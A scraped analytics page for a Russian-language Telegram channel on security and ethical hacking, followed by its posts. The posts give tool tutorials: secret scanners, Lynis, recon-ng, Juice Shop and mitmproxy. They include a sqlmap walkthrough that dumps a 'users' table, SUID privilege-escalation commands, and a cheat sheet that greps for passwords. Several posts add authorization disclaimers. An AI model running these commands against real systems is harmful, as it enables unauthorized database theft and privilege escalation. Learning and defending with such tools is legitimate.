CodeGuard: PySec Edition
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: PySec Edition
Channel CodeGuard: PySec Edition is an active participant. Currently, the community unites 14 005 subscribers, ranking 8 813 in the Technologies & Applications category and 46 176 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 14 005 subscribers.
According to the latest data from 21 September, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 681 over the last 30 days and by 92 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 10.50%. Within the first 24 hours after publication, content typically collects 5.72% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 467 views. Within the first day, a publication typically gains 799 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 7.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 22 September, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
docker run -it -v "$PWD:/pwd" trufflesecurity/trufflehog github --repo https://github.com/target/repo
Ссылка ⭐️ 17k
2. Gitleaks — быстрый сканер с интеграцией в CI/CD
gitleaks detect --source . --verbose
Ссылка ⭐️ 17k
3. GitGuardian (CLI) — ищет 200+ типов секретов
ggshield scan path /home/projectСсылка 💡 Совет: Запускайте на своих репозиториях перед публикацией. 😈 CodeGuard: PySec Edition | Чат
➡️ Свежие CVE и уязвимости ➡️ Новости взломов и утечек ➡️ Аналитика и обзоры ➡️ Подкасты и интервью с экспертамиПочему читать: Один из немногих русскоязычных ресурсов, который оперативно переводит западные разборы и добавляет свои кейсы. Бонусный раздел — «Блоги»: Практикующие пентестеры делятся техниками, скриптами и опытом. 😈 CodeGuard: PySec Edition | Чат
sudo apt install lynis
Запуск аудита:
sudo lynis audit system
Что проверяет:
⚫️Пароли и учётные записи ⚫️Права на файлы (/etc, /var, /tmp) ⚫️Сетевые настройки (SSH, firewall, открытые порты) ⚫️Логирование и доступ к логам ⚫️Наличие бэкдоров и rootkitПример вывода:
[+] SSH — рекомендовано использовать ключи вместо паролей [!] /tmp не смонтирован с nodevФикс проблем:
sudo lynis audit system --quick
sudo lynis audit system --fix
🔥 Бонус: Lynis даёт готовый совет по каждой найденной проблеме.
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/lanmaster53/recon-ng
cd recon-ng
pip install -r REQUIREMENTS
./recon-ng
Базовый кейс:
marketplace install all
workspace create target_company
modules load recon/domains-hosts/bing_domain_web
set source company.com
run
🔥 Кейс: Осинтер получил доступ к Jenkins, когда модуль recon/domains-hosts/hackertarget нашёл скрытый поддомен jenkins.company.com, а recon/contacts-contacts/mailtester подтвердил email техподдержки. Атака через забытый поддомен — самый частый путь.
💡 Совет: Запускайте через прокси.
😈 CodeGuard: PySec Edition | Чатdocker pull ghcr.io/prowlrbot/cybersandbox
😈 CodeGuard: PySec Edition | Чатfind / -name "config.php" 2>/dev/null
2. Искать в файлах (grep)
grep -r "password" /home/
3. Сетевая диагностика
netstat -tulpn
4. Просмотр живых логов
tail -f /var/log/syslog
5. Убить процесс по имени
pkill -f "python evil.py"
6. Права SUID (для повышения привилегий)
find / -perm -4000 2>/dev/null
7. История команд
history | grep nmap
8. Зашифровать файл
gpg -c secret.txt
9. Расшифровать файл
gpg secret.txt.gpg
10. Освободить RAM
echo 3 > /proc/sys/vm/drop_caches
Сохраняйте.
😈 CodeGuard: PySec Edition | Чат🔵Как AiTM-фишинг обходил MFA мейнтейнеров 🔵Почему proof of concept такого червя создали ещё 10 лет назад 🔵Как защитить свои проекты от supply chain-атакИдеально для разработчиков, DevOps и всех, кто работает с open-source. 😈 CodeGuard: PySec Edition | Чат
owasp.org/www-project-juice-shop
Как начать:
docker pull bkimminich/juice-shop
docker run -d -p 3000:3000 bkimminich/juice-shop
Открыть http://localhost:3000
😈 CodeGuard: PySec Edition | Чатgit clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
Шаг 2. Базовое сканирование
python sqlmap.py -u "https://target.com/page?id=1"
Шаг 3. Забираем базы данных
python sqlmap.py -u "https://target.com/page?id=1" --dbs
Шаг 4. Забираем таблицы
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд --tables
Шаг 5. Дамп таблиц
python sqlmap.py -u "https://target.com/page?id=1" -D имя_бд -T users --dump
Важно: Только на своих системах или с разрешения. За несанкционированный доступ — уголовная статья.
😈 CodeGuard: PySec Edition | Чатfind / -perm -4000 2>/dev/null
Проверка на уязвимые известные бинарники:
text
find / -perm -4000 2>/dev/null | grep -E "nmap|vim|find|bash|less|more"
Пример эксплуатации (на своих виртуалках):
/usr/bin/find /etc/passwd -exec whoami \;
Если результат root — вы повысили привилегии.
Что делать для защиты: Убирать SUID с ненужных файлов через chmod u-s /path/to/file
😈 CodeGuard: PySec Edition | Чат🔵Что под ударом: Zyxel NAS, DSL-роутеры, точки доступа. Список: NAS326, NAS542, NWA50AX, WAC500 и другие. 🔵Где искать: Проверьте сайт Zyxel, загрузите ваш IP в поисковик по модели. 🔵Что искать: Пользователи zyfwp, Printer, MFT. В логах SSH — подозрильные входы с незнакомых IP.Как защититься: Обновите прошивку до версии с патчем. Если нет обновления — отключите удалённый доступ к админке. 😈 CodeGuard: PySec Edition | Чат
github.com/qeeqbox/social-analyzer)
Установка:
git clone https://github.com/qeeqbox/social-analyzer
cd social-analyzer
npm install
Запуск: npm start → открыть http://localhost:9000
🔥 Кейс: OSINT-специалист искал угрозы в компании. Забил ник тестировщика из чата поддержки — обнаружил, что тот же логин использовался на форуме по продаже базы клиентов. Нарушителя уволили до утечки.
💡 Совет: Запускайте через VPN, чтобы не спалить IP.
😈 CodeGuard: PySec Edition | Чат🔵Перехват и модификация запросов/ответов на лету 🔵Работа через консоль (mitmproxy) или веб-интерфейс (mitmweb) 🔵Скриптование на Python 🔵Поддержка HTTP/2, WebSocket, gRPCБыстрый старт:
pip install mitmproxy
mitmweb
Важно: Использовать только на своих устройствах или с разрешения владельца.
😈 CodeGuard: PySec Edition | Чат➡️Злоумышленник обманывает процессор, подсовывая фальшивый чип SPD, который врёт о размере памяти. Это создаёт «двойников» физических адресов и позволяет читать зашифрованную память гостевой VMПочему опасно: Атака работает на серверах AMD EPYC (3-е и 4-е поколения) с памятью DDR4/DDR5. Учёные подтвердили, что под ударом AMD SEV-SNP . Что делать: AMD выпустила обновления прошивки. Используйте модули памяти с заблокированным SPD и обновите BIOS 😈 CodeGuard: PySec Edition | Чат
